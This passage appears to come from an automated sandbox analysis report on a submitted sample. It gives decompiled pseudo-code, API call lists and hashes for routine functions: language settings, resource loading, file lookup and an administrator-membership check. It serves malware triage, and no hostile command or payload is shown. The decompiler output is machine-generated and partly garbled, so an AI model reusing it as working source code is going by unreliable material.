				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}





























                                                            0x0041ef0a
                                                            0x0041ef10
                                                            0x0041ef13
                                                            0x0041ef15
                                                            0x0041ef19
                                                            0x0041ef1a
                                                            0x0041ef1f
                                                            0x0041ef22
                                                            0x0041ef2f
                                                            0x0041ef3e
                                                            0x0041ef6e
                                                            0x0041ef7a
                                                            0x0041ef7f
                                                            0x0041ef85
                                                            0x0041ef85
                                                            0x0041efa7
                                                            0x0041efac
                                                            0x0041efb1
                                                            0x0041efb8
                                                            0x0041efc5
                                                            0x0041efcf
                                                            0x0041efd3
                                                            0x0041efda
                                                            0x0041efe4
                                                            0x0041efe4
                                                            0x0041efda
                                                            0x0041eff5
                                                            0x0041effa
                                                            0x0041f009
                                                            0x0041f016
                                                            0x0041f021
                                                            0x0041f027
                                                            0x0041f034
                                                            0x0041f03a
                                                            0x0041f044
                                                            0x0041f04a
                                                            0x0041f051
                                                            0x0041f057
                                                            0x0041f05e
                                                            0x0041f064
                                                            0x0041f080
                                                            0x0041f088
                                                            0x0041f091
                                                            0x0041f094
                                                            0x0041f097
                                                            0x0041f0a7

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                            • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                            • String ID:
                                                            • API String ID: 3990497365-0
                                                            • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                            • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                            • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                            • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}





















                                                            0x0040a6d0
                                                            0x0040a6d2
                                                            0x0040a6d6
                                                            0x0040a6e2
                                                            0x0040a6ec
                                                            0x0040a6ef
                                                            0x0040a6f1
                                                            0x0040a6f8
                                                            0x0040a6fb
                                                            0x0040a70c
                                                            0x0040a712
                                                            0x0040a715
                                                            0x0040a718
                                                            0x0040a71b
                                                            0x0040a721
                                                            0x0040a727
                                                            0x0040a737
                                                            0x0040a737
                                                            0x0040a740
                                                            0x0040a745
                                                            0x0040a749
                                                            0x0040a74e
                                                            0x0040a753
                                                            0x0040a755
                                                            0x0040a756
                                                            0x0040a75d
                                                            0x0040a765
                                                            0x0040a76a
                                                            0x0040a76a
                                                            0x0040a770
                                                            0x0040a773
                                                            0x0040a773
                                                            0x0040a75d
                                                            0x0040a77a
                                                            0x0040a781
                                                            0x0040a781
                                                            0x0040a78a
                                                            0x0040a794
                                                            0x0040a7a2
                                                            0x0040a7aa
                                                            0x0040a7c7
                                                            0x0040a7c7
                                                            0x0040a7cf
                                                            0x00000000
                                                            0x0040a7d7
                                                            0x0040a7e1

                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                            • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                            • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                            • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}






                                                            0x004af9ff
                                                            0x004afa03
                                                            0x004afa05
                                                            0x004afa05
                                                            0x004afa15
                                                            0x004afa17
                                                            0x004afa17
                                                            0x004afa24
                                                            0x004afa28
                                                            0x004afa2a
                                                            0x004afa2a
                                                            0x004afa35
                                                            0x004afa39
                                                            0x004afa3b
                                                            0x004afa3b
                                                            0x004afa43

                                                            APIs
                                                            • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                            • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                            • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                            • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}






                                                            0x00420bde
                                                            0x00420be3
                                                            0x00420be7
                                                            0x00420bef
                                                            0x00420bf4
                                                            0x00420bf4
                                                            0x00420c00
                                                            0x00420c07
                                                            0x00000000
                                                            0x00420c07
                                                            0x00420c0d

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                            • API String ID: 1646373207-1127948838
                                                            • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                            • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                            • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                            • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: br4Cu3BycW.tmp PID: 5636 Parent PID: 5092 br4Cu3BycW.tmpCOMMON

                                                            Executed Functions

                                                            Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E0040E7F0(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t61);
				_push(0x40e8b0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L0040524C();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040B318( &_v20, 4,  &_v16);
				E0040B4C8(_t44, _v20, _v8);
				_t29 = E0040E6A0( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040B318( &_v24, 4,  &_v16);
					E0040B4C8(_t44, _v24, _v8);
					_t40 = E0040E6A0( *_t44, _t44); // executed
					if(_t40 == 0) {
						E0040A1C8(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040E8B7);
				E0040A228( &_v24, 2);
				return E0040A1C8( &_v8);
			}













                                                            0x0040e7f6
                                                            0x0040e7f9
                                                            0x0040e7fc
                                                            0x0040e7ff
                                                            0x0040e801
                                                            0x0040e807
                                                            0x0040e80e
                                                            0x0040e80f
                                                            0x0040e814
                                                            0x0040e817
                                                            0x0040e81c
                                                            0x0040e822
                                                            0x0040e82b
                                                            0x0040e83b
                                                            0x0040e848
                                                            0x0040e84f
                                                            0x0040e856
                                                            0x0040e858
                                                            0x0040e869
                                                            0x0040e876
                                                            0x0040e87d
                                                            0x0040e884
                                                            0x0040e888
                                                            0x0040e888
                                                            0x0040e884
                                                            0x0040e88f
                                                            0x0040e892
                                                            0x0040e895
                                                            0x0040e8a2
                                                            0x0040e8af

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                              • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                              • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                            • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E0060C2B0(void* __eax, struct _WIN32_FIND_DATAW* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v16;
				long _v20;
				void* _t13;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t35 = _t37;
				_t38 = _t37 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t35);
					_push(0x60c313);
					_push( *[fs:eax]);
					 *[fs:eax] = _t38;
					_t13 = FindFirstFileW(E0040B278(__edx), __ecx); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C31A);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0xffffffff;
					return _v8;
				}
			}











                                                            0x0060c2b1
                                                            0x0060c2b3
                                                            0x0060c2cb
                                                            0x0060c2d8
                                                            0x0060c2d9
                                                            0x0060c2de
                                                            0x0060c2e1
                                                            0x0060c2ed
                                                            0x0060c2f2
                                                            0x0060c2fa
                                                            0x0060c2ff
                                                            0x0060c302
                                                            0x0060c305
                                                            0x0060c312
                                                            0x0060c2cd
                                                            0x0060c2cd
                                                            0x0060c32c
                                                            0x0060c32c

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                            • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFileFindFirstLast
                                                            • String ID:
                                                            • API String ID: 873889042-0
                                                            • Opcode ID: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                            • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                            • Opcode Fuzzy Hash: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                            • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E0040E6A0(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t27);
				_push(0x40e6fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E0040B278(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040E705);
				return E0040A1C8( &_v8);
			}








                                                            0x0040e6a9
                                                            0x0040e6aa
                                                            0x0040e6b0
                                                            0x0040e6b7
                                                            0x0040e6b8
                                                            0x0040e6bd
                                                            0x0040e6c0
                                                            0x0040e6d3
                                                            0x0040e6e0
                                                            0x0040e6e3
                                                            0x0040e6e3
                                                            0x0040e6ea
                                                            0x0040e6ed
                                                            0x0040e6f0
                                                            0x0040e6fd

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                            • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 43%
                                                            			E005C7CE0(long __eax) {
				signed char _v5;
				void* _v12;
				char _v16;
				void* _v20;
				long _v24;
				void* _v28;
				struct _SID_IDENTIFIER_AUTHORITY* _v32;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t89;
				long _t97;
				signed int _t100;
				intOrPtr _t105;
				intOrPtr _t106;
				void* _t107;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t115;
				intOrPtr _t116;

				_t113 = _t115;
				_t116 = _t115 + 0xffffffe4;
				_push(_t107);
				_t97 = __eax;
				if(E00429D18() == 2) {
					_v5 = 0;
					_v32 = 0x6ccce0;
					if(AllocateAndInitializeSid(_v32, 2, 0x20, _t97, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						goto L26;
					} else {
						_push(_t113);
						_push(0x5c7ecb);
						_push( *[fs:eax]);
						 *[fs:eax] = _t116;
						_t99 = 0;
						if((GetVersion() & 0x000000ff) >= 5) {
							_t99 = E00414020(0, _t107, GetModuleHandleW(L"advapi32.dll"), L"CheckTokenMembership");
						}
						if(_t99 == 0) {
							_v28 = 0;
							if(OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v20) != 0) {
								L13:
								_push(_t113);
								_push(0x5c7ead);
								_push( *[fs:eax]);
								 *[fs:eax] = _t116;
								_v24 = 0;
								if(GetTokenInformation(_v20, 2, 0, 0,  &_v24) != 0 || GetLastError() == 0x7a) {
									_v28 = E00406F0C(_v24);
									if(GetTokenInformation(_v20, 2, _v28, _v24,  &_v24) != 0) {
										_t110 =  *_v28 - 1;
										if(_t110 >= 0) {
											_t111 = _t110 + 1;
											_t100 = 0;
											while(EqualSid(_v12,  *(_v28 + 4 + _t100 * 8)) == 0 || ( *(_v28 + 8 + _t100 * 8) & 0x00000014) != 4) {
												_t100 = _t100 + 1;
												_t111 = _t111 - 1;
												if(_t111 != 0) {
													continue;
												}
												goto L24;
											}
											_v5 = 1;
										}
										L24:
										_pop(_t105);
										 *[fs:eax] = _t105;
										_push(E005C7EB4);
										E00406F28(_v28);
										return CloseHandle(_v20);
									} else {
										E004099B8();
										E004099B8();
										goto L26;
									}
								} else {
									E004099B8();
									E004099B8();
									goto L26;
								}
							} else {
								if(GetLastError() == 0x3f0) {
									if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
										goto L13;
									} else {
										E004099B8();
										goto L26;
									}
								} else {
									E004099B8();
									goto L26;
								}
							}
						} else {
							_t89 =  *_t99(0, _v12,  &_v16); // executed
							if(_t89 != 0) {
								asm("sbb eax, eax");
								_v5 = _t89 + 1;
							}
							_pop(_t106);
							 *[fs:eax] = _t106;
							_push(E005C7ED2);
							return FreeSid(_v12);
						}
					}
				} else {
					_v5 = 1;
					L26:
					return _v5 & 0x000000ff;
				}
			}
























                                                            0x005c7ce1
                                                            0x005c7ce3
                                                            0x005c7ce7
                                                            0x005c7ce8
                                                            0x005c7cf2
                                                            0x005c7cfd
                                                            0x005c7d06
                                                            0x005c7d29
                                                            0x00000000
                                                            0x005c7d2f
                                                            0x005c7d31
                                                            0x005c7d32
                                                            0x005c7d37
                                                            0x005c7d3a
                                                            0x005c7d3d
                                                            0x005c7d4d
                                                            0x005c7d64
                                                            0x005c7d64
                                                            0x005c7d68
                                                            0x005c7d8f
                                                            0x005c7da7
                                                            0x005c7dde
                                                            0x005c7de0
                                                            0x005c7de1
                                                            0x005c7de6
                                                            0x005c7de9
                                                            0x005c7dee
                                                            0x005c7e06
                                                            0x005c7e29
                                                            0x005c7e45
                                                            0x005c7e58
                                                            0x005c7e5b
                                                            0x005c7e5d
                                                            0x005c7e5e
                                                            0x005c7e60
                                                            0x005c7e8a
                                                            0x005c7e8b
                                                            0x005c7e8c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x005c7e8c
                                                            0x005c7e84
                                                            0x005c7e84
                                                            0x005c7e8e
                                                            0x005c7e90
                                                            0x005c7e93
                                                            0x005c7e96
                                                            0x005c7e9e
                                                            0x005c7eac
                                                            0x005c7e47
                                                            0x005c7e47
                                                            0x005c7e4c
                                                            0x00000000
                                                            0x005c7e4c
                                                            0x005c7e12
                                                            0x005c7e12
                                                            0x005c7e17
                                                            0x00000000
                                                            0x005c7e17
                                                            0x005c7da9
                                                            0x005c7db3
                                                            0x005c7dd2
                                                            0x00000000
                                                            0x005c7dd4
                                                            0x005c7dd4
                                                            0x00000000
                                                            0x005c7dd4
                                                            0x005c7db5
                                                            0x005c7db5
                                                            0x00000000
                                                            0x005c7db5
                                                            0x005c7db3
                                                            0x005c7d6a
                                                            0x005c7d74
                                                            0x005c7d78
                                                            0x005c7d82
